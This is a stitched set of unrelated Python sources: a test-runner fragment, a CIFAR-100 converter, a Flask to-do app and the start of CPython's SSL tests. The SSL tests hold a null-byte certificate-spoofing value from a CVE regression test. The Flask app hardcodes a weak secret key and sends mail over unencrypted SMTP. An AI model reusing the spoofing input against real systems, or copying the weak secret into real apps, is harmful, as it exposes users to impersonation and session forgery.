elapsed = math.floor(elapsed)
seconds = elapsed % 60
elapsed = math.floor(elapsed / 60)
minutes = elapsed % 60
hours = math.floor(elapsed / 60)
ret = "%ds" % (seconds,)
if minutes or hours:
ret = "%dm%s" % (minutes, ret)
if hours:
ret = "%dh%s" % (hours, ret)
return ret
def format_running(self, max):
ret = ''
for i in range(max):
if i > 0:
ret += ', '
ret += self.running_list[i]
if len(self.running_list) > max:
if max > 0:
ret += ', '
ret += "..."
return ret
def show(self, line):
self.clear_status()
self.buffer += line + "\n"
self.show_status()
def flush(self):
sys.stdout.write(self.buffer)
self.buffer = ''
sys.stdout.flush()
# Lock access to an object with a lock
class Locked(object):
def __init__(self, value=None):
self.value = value
self.lock = threading.Lock()
def __enter__(self):
self.lock.acquire()
return self.value
def __exit__(self, e, x, c):
self.lock.release()
def copy(self):
with self as value:
return value.copy()
# Run a single test in a separate process
class TestProcess(object):
def __init__(self, runner, id, test, dir, run_dir):
self.runner = runner
self.id = id
self.name = id[0]
self.test = test
self.timeout = test.timeout() or runner.timeout
self.supervisor = None
self.process = None
self.dir = abspath(dir)
self.run_dir = abspath(run_dir) if run_dir else None
self.gracefull_kill = False
self.terminate_thread = None
def start(self):
try:
self.runner.tell(TestRunner.STARTED, self.id, self)
os.mkdir(self.dir)
if self.run_dir:
os.mkdir(self.run_dir)
with open(join(self.dir, "description"), 'w') as file:
file.write(str(self.test))
self.supervisor = threading.Thread(target=self.supervise, name="supervisor:" + self.name)
self.supervisor.daemon = True
self.supervisor.start()
except Exception:
raise
def run(self, write_pipe):
def recordSignal(signum, frame):
print('Ignored signal SIGINT')
signal.signal(signal.SIGINT, recordSignal) # avoiding a problem where signal.SIG_IGN would cause the test to never stop
sys.stdin.close()
redirect_fd_to_file(1, join(self.dir, "stdout"), tee=self.runner.verbose)
redirect_fd_to_file(2, join(self.dir, "stderr"), tee=self.runner.verbose)
os.chdir(self.run_dir or self.dir)
os.setpgrp()
with Timeout(self.timeout):
try:
self.test.run()
except TimeoutException:
write_pipe.send(TestRunner.TIMED_OUT)
except:
sys.stdout.write(traceback.format_exc() + '\n')
sys.stderr.write(str(sys.exc_info()[1]) + '\n')
write_pipe.send(TestRunner.FAILED)
else:
write_pipe.send(TestRunner.SUCCESS)
finally:
if self.run_dir:
for file in os.listdir(self.run_dir):
shutil.move(join(self.run_dir, file), join(self.dir, file))
os.rmdir(self.run_dir)
def write_fail_message(self, message):
with open(join(self.dir, "stderr"), 'a') as file:
file.write(message)
with open(join(self.dir, "fail_message"), 'a') as file:
file.write(message)
def tail_error(self):
with open(join(self.dir, "stderr")) as f:
lines = f.read().split('\n')[-10:]
if len(lines) < 10:
with open(join(self.dir, "stdout")) as f:
lines = f.read().split('\n')[-len(lines):] + lines
return '\n'.join(lines)
def supervise(self):
read_pipe, write_pipe = multiprocessing.Pipe(False)
self.process = multiprocessing.Process(target=self.run, args=[write_pipe], name="subprocess:" + self.name)
self.process.start()
self.process.join(self.timeout + 5)
if self.terminate_thread:
self.terminate_thread.join()
if self.gracefull_kill:
with open(join(self.dir, "killed"), "a") as file:
file.write("Test killed")
self.runner.tell(TestRunner.KILLED, self.id, self)
elif self.process.is_alive():
self.terminate()
self.terminate_thread.join()
self.write_fail_message("Test failed to exit after timeout of %d seconds" % self.timeout)
self.runner.tell(TestRunner.FAILED, self.id, self)
elif self.process.exitcode:
self.write_fail_message("Test exited abnormally with error code %d" % self.process.exitcode)
self.runner.tell(TestRunner.FAILED, self.id, self)
else:
try:
write_pipe.close()
status = read_pipe.recv()
except EOFError:
self.write_fail_message("Test did not fail, but"
" failed to report its success")
status = TestRunner.FAILED
else:
if status != TestRunner.SUCCESS:
with open(join(self.dir, "fail_message"), 'a') as file:
file.write('Failed')
self.runner.tell(status, self.id, self)
def join(self):
while self.supervisor.is_alive():
self.supervisor.join(1)
def terminate_thorough(self):
if not self.process:
return
pid = self.process.pid
self.process.terminate()
self.process.join(5)
for sig in [signal.SIGTERM, signal.SIGABRT, signal.SIGKILL]:
try:
os.killpg(pid, sig)
except OSError:
break
time.sleep(2)
def terminate(self, gracefull_kill=False):
if gracefull_kill:
self.gracefull_kill = True
if self.terminate_thread:
return
self.terminate_thread = threading.Thread(target=self.terminate_thorough, name='terminate:' + self.name)
self.terminate_thread.start()
def pid(self):
return self.process.pid
class TimeoutException(Exception):
pass
# A scoped timeout for single-threaded processes
class Timeout(object):
def __init__(self, seconds):
self.timeout = seconds
def __enter__(self):
signal.signal(signal.SIGALRM, self.alarm)
signal.alarm(self.timeout)
def __exit__(self, type, exception, trace):
signal.alarm(0)
@staticmethod
def alarm(*ignored):
raise TimeoutException()
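# Hedged usage sketch: the SIGALRM-based Timeout above only works on the main
# thread, which is why TestProcess.run applies it inside the forked child
# process; a caller would wrap a slow step like this (possibly_slow_step is a
# hypothetical callable):
#
#   with Timeout(30):
#       possibly_slow_step()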
# A FilterSource describes what group a filter comes from
class FilterSource(object):
def __init__(self, group=None, weak=True):
self.group = group
self.weak = weak
def copy(self, weak=True):
return FilterSource(self.group, weak=weak)
def combined(self, other):
if self.weak:
return other
return self
def show(self, default='user input'):
if self.group:
return 'group ' + self.group
else:
return default
# A test filter that discriminates tests by name
class TestFilter(object):
INCLUDE = 'INCLUDE'
EXCLUDE = 'EXCLUDE'
def __init__(self, default=EXCLUDE, group=None):
self.default = default
self.tree = {}
self.was_matched = False
self.group = group
@classmethod
def parse(self, args, groups, group=None):
if not args:
return TestFilter(self.INCLUDE, group=FilterSource(group))
if args[0][0] == '!':
filter = TestFilter(self.INCLUDE, group=FilterSource(group))
else:
filter = TestFilter(self.EXCLUDE, group=FilterSource(group))
for arg in args:
if arg[0] == '!':
arg = arg[1:]
type = self.EXCLUDE
else:
type = self.INCLUDE
if arg in groups:
group = self.parse(groups[arg], groups, group=arg)
filter.combine(type, group)
else:
path = arg.split('.')
if path[-1] == '*':
path = path[:-1]
filter.at(path).reset(type)
return filter
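# Hedged illustration of the pattern syntax handled above (test names are
# hypothetical):
#
#   TestFilter.parse(['unit.*', '!unit.slow'], groups={})
#
# keeps every test under `unit` except `unit.slow`; an argument matching a key
# in `groups` expands to that group's pattern list, and a leading '!' on the
# first pattern flips the default so unmatched tests are included.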
def combine(self, type, other):
for name in set(self.tree.keys()) | set(other.tree.keys()):
self.zoom(name, create=True).combine(type, other.zoom(name))
if other.default == self.INCLUDE:
self.default = type
self.group = self.group.combined(other.group)
def at(self, path):
if not path:
return self
else:
return self.zoom(path[0], create=True).at(path[1:])
def reset(self, type=EXCLUDE, weak=False):
self.group.weak = self.group.weak and weak
self.default = type
self.tree = {}
def match(self, test=None):
self.was_matched = True
return self.default == self.INCLUDE
def zoom(self, name, create=False):
try:
return self.tree[name]
except KeyError:
subfilter = TestFilter(self.default, group=self.group.copy())
if create:
self.tree[name] = subfilter
return subfilter
def check_use(self, path=[]):
if not self.was_matched:
message = 'No such test ' + '.'.join(path) + ' (from ' + self.group.show() + ')'
if self.group.group:
print('Warning: ' + message)
else:
raise Exception(message)
for name, filter in self.tree.items():
filter.check_use(path + [name])
def __repr__(self):
return ("TestFilter(" + self.default + ", " + repr(self.was_matched) +
", " + repr(self.tree) + ")")
def all_same(self):
self.was_matched = True
return not self.tree
# A test filter that discriminates using a predicate
class PredicateFilter(object):
def __init__(self, predicate):
self.predicate = predicate
def all_same(self):
return False
def match(self, test=None):
if test:
return self.predicate(test)
return True
def zoom(self, name):
return self
# A base class for tests or groups of tests
class Test(object):
def __init__(self, timeout=None):
self._timeout = timeout
def run(self):
raise Exception("run is not defined for the %s class" %
(type(self).__name__,))
def filter(self, filter):
if filter.match(self):
return self
else:
return None
def __iter__(self):
yield (None, self)
def timeout(self):
return self._timeout
def requirements(self):
return []
def configure(self, conf):
return self
# A simple test just runs a python function
class SimpleTest(Test):
def __init__(self, run, **kwargs):
Test.__init__(self, **kwargs)
self._run = run
def run(self):
self._run()
# A tree of named tests
class TestTree(Test):
def __init__(self, tests={}):
self.tests = dict(tests)
def filter(self, filter):
if filter.all_same():
if filter.match():
return self
else:
return TestTree()
trimmed = TestTree()
for name, test in self.tests.items():
subfilter = filter.zoom(name)
trimmed[name] = test.filter(subfilter)
return trimmed
def run(self):
for test in self.tests.values():
test.run()
def __getitem__(self, name):
return self.tests[name]
def __setitem__(self, name, test):
if not test or (isinstance(test, TestTree) and not test.tests):
try:
del(self.tests[name])
except KeyError:
pass
else:
self.tests[name] = test
def add(self, name, test):
if name in self.tests:
raise Exception('Test already exists: %s' % (name,))
self.tests[name] = test
def __iter__(self):
for name in sorted(self.tests.keys()):
for subname, test in self.tests[name]:
if subname:
yield (name + '.' + subname, test)
else:
yield name, test
def requirements(self):
for test in self.tests.values():
for req in test.requirements():
yield req
def configure(self, conf):
return TestTree({test: self.tests[test].configure(conf) for test in self.tests})
def __len__(self):
count = 0
for __, ___ in self:
count += 1
return count
def has_test(self, name):
return name in self.tests
# Used with `--load' to load old test results
def load_test_results_as_tests(path):
tests = TestTree()
for dir in os.listdir(path):
full_dir = join(path, dir)
if not os.path.isdir(full_dir):
continue
names = list(reversed(dir.split('.')))
parent = tests
while parent.has_test(names[-1]):
parent = parent[names[-1]]
names.pop()
test = OldTest(full_dir)
for name in names[:-1]:
test = TestTree({name: test})
parent[names[-1]] = test
return tests
# A test that has already run
class OldTest(Test):
def __init__(self, dir, **kwargs):
Test.__init__(self, **kwargs)
self.dir = dir
def __str__(self):
return self.read_file('description', 'unknown test')
def read_file(self, name, default=None):
try:
with open(join(self.dir, name)) as file:
return file.read()
except Exception as e:
# TODO: catch the right exception here
return default
def passed(self):
return not os.path.exists(join(self.dir, "fail_message"))
def killed(self):
return os.path.exists(join(self.dir, "killed"))
def dump_file(self, name):
with open(join(self.dir, name)) as f:
for line in f:
print(line, end=' ')
def dump_log(self):
self.dump_file("stdout")
self.dump_file("stderr")
print()
def list_files(self, glob=None, text_only=True):
for root, dirs, files in os.walk(self.dir):
for file in files:
name = relpath(join(root, file), self.dir)
if not glob or fnmatch.fnmatch(name, glob):
if not text_only or name == glob or utils.guess_is_text_file(join(root, file)):
yield name
def group_from_file(path):
patterns = []
with open(path) as f:
for line in f:
line = line.split('#')[0]
if line:
patterns += line.split()
return patterns
|
cifar100_to_mr.py
|
# Copyright 2019 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
Cifar100 convert tool for MindRecord.
"""
from importlib import import_module
import os
import numpy as np
from mindspore import log as logger
from .cifar100 import Cifar100
from ..common.exceptions import PathNotExistsError
from ..filewriter import FileWriter
from ..shardutils import check_filename, ExceptionThread, SUCCESS, FAILED
try:
cv2 = import_module("cv2")
except ModuleNotFoundError:
cv2 = None
__all__ = ['Cifar100ToMR']
class Cifar100ToMR:
"""
A class to transform from cifar100 to MindRecord.
Args:
source (str): the cifar100 directory to be transformed.
destination (str): the MindRecord file path to transform into.
Raises:
ValueError: If source or destination is invalid.
"""
def __init__(self, source, destination):
check_filename(source)
self.source = source
files = os.listdir(self.source)
train_data_flag = False
test_data_flag = False
for file in files:
if file == "train":
train_data_flag = True
if file == "test":
test_data_flag = True
if not train_data_flag:
raise PathNotExistsError("train")
if not test_data_flag:
raise PathNotExistsError("test")
check_filename(destination)
self.destination = destination
self.writer = None
def run(self, fields=None):
"""
Executes transformation from cifar100 to MindRecord.
Args:
fields (list[str]): A list of index fields, e.g. ["fine_label", "coarse_label"].
Returns:
SUCCESS or FAILED, whether cifar100 is successfully transformed to MindRecord.
"""
if fields and not isinstance(fields, list):
raise ValueError("The parameter fields should be None or list")
cifar100_data = Cifar100(self.source, False)
cifar100_data.load_data()
images = cifar100_data.images
logger.info("train images: {}".format(images.shape))
fine_labels = cifar100_data.fine_labels
logger.info("train images fine label: {}".format(fine_labels.shape))
coarse_labels = cifar100_data.coarse_labels
logger.info("train images coarse label: {}".format(coarse_labels.shape))
test_images = cifar100_data.Test.images
logger.info("test images: {}".format(test_images.shape))
test_fine_labels = cifar100_data.Test.fine_labels
logger.info("test images fine label: {}".format(fine_labels.shape))
test_coarse_labels = cifar100_data.Test.coarse_labels
logger.info("test images coarse label: {}".format(coarse_labels.shape))
data_list = _construct_raw_data(images, fine_labels, coarse_labels)
test_data_list = _construct_raw_data(test_images, test_fine_labels, test_coarse_labels)
if _generate_mindrecord(self.destination, data_list, fields, "img_train") != SUCCESS:
return FAILED
if _generate_mindrecord(self.destination + "_test", test_data_list, fields, "img_test") != SUCCESS:
return FAILED
return SUCCESS
def transform(self, fields=None):
t = ExceptionThread(target=self.run, kwargs={'fields': fields})
t.daemon = True
t.start()
t.join()
if t.exitcode != 0:
raise t.exception
return t.res
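# A hedged usage sketch (paths are illustrative, not shipped with this module):
#
#   cifar100_transformer = Cifar100ToMR("/path/to/cifar-100-python",
#                                       "/path/to/output/cifar100.mindrecord")
#   cifar100_transformer.transform(fields=["fine_label", "coarse_label"])
#
# transform() runs the conversion on a helper thread and re-raises any error;
# run() writes <destination> for the train split and <destination>_test for
# the test split.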
def _construct_raw_data(images, fine_labels, coarse_labels):
"""
Construct raw data from cifar100 data.
Args:
images (list): image list from cifar100.
fine_labels (list): fine label list from cifar100.
coarse_labels (list): coarse label list from cifar100.
Returns:
list[dict], the raw data rows ready to be written into MindRecord.
"""
if not cv2:
raise ModuleNotFoundError("opencv-python module not found, please install it with pip.")
raw_data = []
for i, img in enumerate(images):
fine_label = int(fine_labels[i][0])
coarse_label = int(coarse_labels[i][0])
_, img = cv2.imencode(".jpeg", img[..., [2, 1, 0]])
row_data = {"id": int(i),
"data": img.tobytes(),
"fine_label": int(fine_label),
"coarse_label": int(coarse_label)}
raw_data.append(row_data)
return raw_data
def _generate_mindrecord(file_name, raw_data, fields, schema_desc):
"""
Generate MindRecord file from raw data.
Args:
file_name (str): File name of MindRecord File.
fields (list[str]): Fields would be set as index which
could not belong to blob fields and type could not be 'array' or 'bytes'.
raw_data (dict): Dict of raw data.
schema_desc (str): String of schema description.
Returns:
SUCCESS/FAILED, whether successfully written into MindRecord.
"""
schema = {"id": {"type": "int64"}, "fine_label": {"type": "int64"},
"coarse_label": {"type": "int64"}, "data": {"type": "bytes"}}
logger.info("transformed MindRecord schema is: {}".format(schema))
writer = FileWriter(file_name, 1)
writer.add_schema(schema, schema_desc)
if fields and isinstance(fields, list):
writer.add_index(fields)
writer.write_raw_data(raw_data)
return writer.commit()
|
app.py
|
# -*- coding:utf-8 -*-
import os
from threading import Thread
from flask import Flask, request
from flask import redirect, url_for
from flask import flash
from flask import render_template
from flask_login import login_user, LoginManager, login_required, logout_user, current_user
from flask_bootstrap import Bootstrap
from flask_script import Manager, Shell
from flask_migrate import Migrate, MigrateCommand
from flask_moment import Moment
from flask_mail import Mail, Message
from form import LoginForm, TaskForm, RegistrationForm
from models import db, User, Task
basedir = os.path.abspath(os.path.dirname(__file__))
app = Flask(__name__)
app.config['SECRET_KEY'] = 'hard to guess string'
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///' + os.path.join(basedir, 'data.sqlite')
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['MAIL_SERVER'] = 'smtp.126.com'
app.config['MAIL_PORT'] = 25
app.config['MAIL_USE_TLS'] = False
app.config['MAIL_USERNAME'] = os.environ.get('MAIL_USERNAME')
app.config['MAIL_PASSWORD'] = os.environ.get('MAIL_PASSWORD')
app.config['FLASKY_MAIL_SUBJECT_PREFIX'] = '[TODOLIST]'
app.config['FLASKY_MAIL_SENDER'] = 'Daytodo-Admin<kidult1107@126.com>'
app.config['FLASKY_ADMIN'] = os.environ.get('FLASKY_ADMIN') # administrator's email address
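# The mail credentials and admin address above are read from the environment;
# a hedged example of exporting them before launching (values are illustrative):
#
#   export MAIL_USERNAME=yourname@126.com
#   export MAIL_PASSWORD=your-smtp-password
#   export FLASKY_ADMIN=yourname@126.com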
manager = Manager(app)
bootstrap = Bootstrap(app)
db.init_app(app)
migrate = Migrate(app, db)
moment = Moment(app)
mail = Mail(app)
login_manager = LoginManager(app)
login_manager.session_protection = 'strong'
login_manager.login_view = 'login'
@login_manager.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(to, subject, template, **kwargs):
msg = Message(app.config['FLASKY_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['FLASKY_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
# cannot use this hook; enabling it causes errors
# @app.before_request
# def before_request():
# if not current_user.confirmed:
# return redirect(url_for('unconfirmed'))
@app.route('/unconfirmed')
def unconfirmed():
if current_user.confirmed:
return redirect(url_for('index'))
return render_template('unconfirmed.html')
@app.route("/")
@login_required
def index():
if not current_user.confirmed:
return redirect(url_for('unconfirmed'))
# look up the tasks for current_user.id and render them with the template
tasks = Task.query.filter_by(user_id=current_user.id).all()
return render_template("index.html", tasks=tasks)
@app.route("/add", methods=["GET", "POST"])
@login_required
def add():
if not current_user.confirmed:
return redirect(url_for('unconfirmed'))
form = TaskForm()
if form.validate_on_submit():
task = Task(current_user.id, form.title.data, form.status.data)
db.session.add(task)
db.session.commit()
flash("Add one task.")
return redirect(url_for("index"))
return render_template("add.html", form=form)
@app.route("/delete/<int:article_id>")
@login_required
def delete(article_id):
if not current_user.confirmed:
return redirect(url_for('unconfirmed'))
task = Task.query.filter_by(id=article_id).first_or_404()
db.session.delete(task)
db.session.commit()
flash("Delete one task.")
return redirect(url_for("index"))
@app.route("/change/<int:article_id>", methods=["GET", "POST"])
@login_required
def change(article_id):
if not current_user.confirmed:
return redirect(url_for('unconfirmed'))
form = TaskForm()
task = Task.query.filter_by(id=article_id).first_or_404()
if form.validate_on_submit():
task.title = form.title.data
task.status = form.status.data
db.session.add(task)
db.session.commit()
return redirect(url_for("index"))
form.title.data = task.title
form.status.data = task.status
return render_template("modify.html", form=form)
@app.route("/login", methods=["GET", "POST"])
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
if user is not None and user.verify_password(form.password.data):
login_user(user)
return redirect(url_for("index"))
flash("Invalid email or password.")
return redirect(url_for("login")) # Post/重定向/Get模式,确保最后一个请求是get请求
return render_template('login.html', form=form)
@app.route("/logout")
@login_required
def logout():
logout_user()
flash("You had logout!!!")
return redirect(url_for("login"))
@app.route('/register', methods=['GET', 'POST'])
def register():
form = RegistrationForm()
if form.validate_on_submit():
user = User(email=form.email.data,
username=form.username.data,
password=form.password.data)
db.session.add(user)
db.session.commit()
token = user.generate_confirmation_token()
send_email(user.email, 'Confirm Your Account',
'email/confirm', user=user, token=token)
flash('A confirmation email has been sent to you by email.')
return redirect(url_for('login'))
return render_template('register.html', form=form)
@app.route('/confirm/<token>')
#@login_required
def confirm(token):
if current_user.confirmed: # open question: when this link is clicked from the email, is current_user available here?
return redirect(url_for('index'))
if current_user.confirm(token):
flash('You have confirmed your account. Thanks!')
else:
flash('The confirmation link is invalid or has expired.')
return redirect(url_for('index'))
@app.route('/confirm')
@login_required
def resend_confirmation():
token = current_user.generate_confirmation_token()
send_email(current_user.email, 'Confirm Your Account',
'email/confirm', user=current_user, token=token)
flash('A new confirmation email has been sent to you by email.')
return redirect(url_for('index'))
@app.errorhandler(404)
def page_not_found(e):
return render_template('404.html'), 404
@app.errorhandler(500)
def internal_server_error(e):
return render_template('500.html'), 500
def make_shell_context():
return dict(app=app, db=db, User=User, Task=Task)
manager.add_command("shell", Shell(make_context=make_shell_context))
manager.add_command('db', MigrateCommand)
if __name__ == "__main__":
manager.run()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import tempfile
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE2 = data_file("keycert4.pem")
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
DHFILE = data_file("dh1024.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
# Issue #9415: Ubuntu hijacks their OpenSSL and forcefully disables SSLv2
def skip_if_broken_ubuntu_ssl(func):
if hasattr(ssl, 'PROTOCOL_SSLv2'):
@functools.wraps(func)
def f(*args, **kwargs):
try:
ssl.SSLContext(ssl.PROTOCOL_SSLv2)
except ssl.SSLError:
if (ssl.OPENSSL_VERSION_INFO == (0, 9, 8, 15, 15) and
platform.linux_distribution() == ('debian', 'squeeze/sid', '')):
raise unittest.SkipTest("Patched Ubuntu OpenSSL breaks behaviour")
return func(*args, **kwargs)
return f
else:
return func
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
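# Hedged note: this helper mirrors the legacy ssl.wrap_socket() keyword
# interface on top of an explicit SSLContext, e.g. (with a hypothetical
# connected socket `s`):
#
#   ss = test_wrap_socket(s, cert_reqs=ssl.CERT_REQUIRED, ca_certs=CAFILE_CACERT)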
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
p = ssl._ssl._test_decode_cert(CERTFILE)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['issuer'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
# Note the next three asserts will fail if the keys are regenerated
self.assertEqual(p['notAfter'], asn1time('Oct 5 23:01:56 2020 GMT'))
self.assertEqual(p['notBefore'], asn1time('Oct 8 23:01:56 2010 GMT'))
self.assertEqual(p['serialNumber'], 'D7C7381919AFC24E')
self.assertEqual(p['subject'],
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),))
)
self.assertEqual(p['subjectAltName'], (('DNS', 'localhost'),))
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
